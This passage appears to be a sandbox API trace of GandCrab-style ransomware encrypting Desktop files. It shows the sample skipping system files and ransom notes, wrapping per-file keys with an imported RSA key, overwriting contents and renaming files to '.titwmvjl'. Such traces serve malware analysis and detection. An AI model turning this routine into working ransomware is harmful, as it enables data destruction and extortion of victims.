lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\3 e7j3up.wav.titwmvjl"), dwFlags=0x1) returned 1 [0087.322] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.322] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.322] lstrcmpW (lpString1="30BtK.jpg", lpString2=".") returned 1 [0087.322] lstrcmpW (lpString1="30BtK.jpg", lpString2="..") returned 1 [0087.322] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="30BtK.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg" [0087.322] lstrlenW (lpString=".titwmvjl") returned 9 [0087.322] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg") returned 39 [0087.322] VirtualAlloc (lpAddress=0x0, dwSize=0x8e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.322] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg.titwmvjl") returned 48 [0087.322] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg") returned 39 [0087.322] lstrlenW (lpString=".jpg") returned 4 [0087.322] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.322] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".jpg ") returned 5 [0087.323] lstrcmpiW (lpString1=".jpg", lpString2=".titwmvjl") returned -1 [0087.323] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg") returned 39 [0087.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg") returned 39 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="desktop.ini") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="autorun.inf") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="ntuser.dat") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="iconcache.db") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="bootsect.bak") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="boot.ini") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="ntuser.dat.log") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="thumbs.db") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="KRAB-DECRYPT.html") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="CRAB-DECRYPT.html") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="ntldr") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="NTDETECT.COM") returned -1 [0087.323] lstrcmpiW (lpString1="30BtK.jpg", lpString2="Bootfont.bin") returned -1 [0087.323] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg") returned 39 [0087.323] lstrlenW (lpString=".jpg") returned 4 [0087.323] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.323] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".jpg ") returned 5 [0087.323] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.324] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.324] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\30btk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0087.324] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.324] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0087.325] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.325] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.325] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.327] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.327] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.327] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.327] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0087.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.328] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.328] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.328] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.329] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.330] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.330] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.330] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0087.330] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.330] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.330] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.330] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.330] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.331] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503578) returned 1 [0087.331] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.332] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.332] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.332] GetLastError () returned 0x0 [0087.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.332] CryptDestroyKey (hKey=0x503578) returned 1 [0087.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.332] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.332] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.334] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503638) returned 1 [0087.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.334] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.334] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.334] GetLastError () returned 0x0 [0087.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.334] CryptDestroyKey (hKey=0x503638) returned 1 [0087.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.335] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.335] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0087.335] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0087.335] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xf3c6, lpOverlapped=0x0) returned 1 [0087.347] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff0c3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.348] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf3c6, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xf3c6, lpOverlapped=0x0) returned 1 [0087.349] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.349] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0087.350] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.354] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.354] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.354] CloseHandle (hObject=0x2ac) returned 1 [0087.355] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\30btk.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\30BtK.jpg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\30btk.jpg.titwmvjl"), dwFlags=0x1) returned 1 [0087.355] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.355] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.355] lstrcmpW (lpString1="4TOB.swf", lpString2=".") returned 1 [0087.355] lstrcmpW (lpString1="4TOB.swf", lpString2="..") returned 1 [0087.355] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="4TOB.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf" [0087.355] lstrlenW (lpString=".titwmvjl") returned 9 [0087.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf") returned 38 [0087.355] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.356] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf.titwmvjl") returned 47 [0087.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf") returned 38 [0087.356] lstrlenW (lpString=".swf") returned 4 [0087.356] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.356] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0087.356] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0087.356] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf") returned 38 [0087.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf") returned 38 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="desktop.ini") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="autorun.inf") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="ntuser.dat") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="iconcache.db") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="bootsect.bak") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="boot.ini") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="ntuser.dat.log") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="thumbs.db") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="CRAB-DECRYPT.html") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="ntldr") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="NTDETECT.COM") returned -1 [0087.356] lstrcmpiW (lpString1="4TOB.swf", lpString2="Bootfont.bin") returned -1 [0087.357] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf") returned 38 [0087.357] lstrlenW (lpString=".swf") returned 4 [0087.357] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.357] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0087.357] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.357] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.357] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\4tob.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0087.357] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.357] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0087.358] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.358] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.359] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.360] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.360] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.360] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0087.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.360] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.360] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.361] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.362] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.362] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.362] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.362] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0087.362] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.363] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.363] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.363] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.364] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.364] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5037f8) returned 1 [0087.364] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.364] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.364] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.365] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.365] GetLastError () returned 0x0 [0087.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.365] CryptDestroyKey (hKey=0x5037f8) returned 1 [0087.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.365] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.365] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.366] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.366] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5032f8) returned 1 [0087.366] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.367] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.367] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.367] GetLastError () returned 0x0 [0087.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.367] CryptDestroyKey (hKey=0x5032f8) returned 1 [0087.367] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.367] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.367] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0087.368] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0087.368] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x14bcd, lpOverlapped=0x0) returned 1 [0087.381] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffeb433, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.381] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14bcd, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x14bcd, lpOverlapped=0x0) returned 1 [0087.382] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.382] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0087.383] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.387] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.387] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.387] CloseHandle (hObject=0x2ac) returned 1 [0087.388] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\4tob.swf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\4TOB.swf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\4tob.swf.titwmvjl"), dwFlags=0x1) returned 1 [0087.389] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.389] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.389] lstrcmpW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2=".") returned 1 [0087.389] lstrcmpW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="..") returned 1 [0087.389] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="51laWAqjIaVoS044Fk.rtf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf" [0087.389] lstrlenW (lpString=".titwmvjl") returned 9 [0087.389] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf") returned 52 [0087.389] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.389] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf.titwmvjl") returned 61 [0087.457] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf") returned 52 [0087.457] lstrlenW (lpString=".rtf") returned 4 [0087.457] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.457] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".rtf ") returned 5 [0087.457] lstrcmpiW (lpString1=".rtf", lpString2=".titwmvjl") returned -1 [0087.457] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.457] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf") returned 52 [0087.457] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\51laWAqjIaVoS044Fk.rtf") returned 52 [0087.457] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="desktop.ini") returned -1 [0087.457] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="autorun.inf") returned -1 [0087.457] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="ntuser.dat") returned -1 [0087.457] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="iconcache.db") returned -1 [0087.457] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="bootsect.bak") returned -1 [0087.457] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="boot.ini") returned -1 [0087.457] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="ntuser.dat.log") returned -1 [0087.458] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="thumbs.db") returned -1 [0087.458] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0087.458] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0087.458] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="KRAB-DECRYPT.html") returned -1 [0087.458] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="CRAB-DECRYPT.html") returned -1 [0087.458] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.458] lstrcmpiW (lpString1="51laWAqjIaVoS044Fk.rtf", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.458] 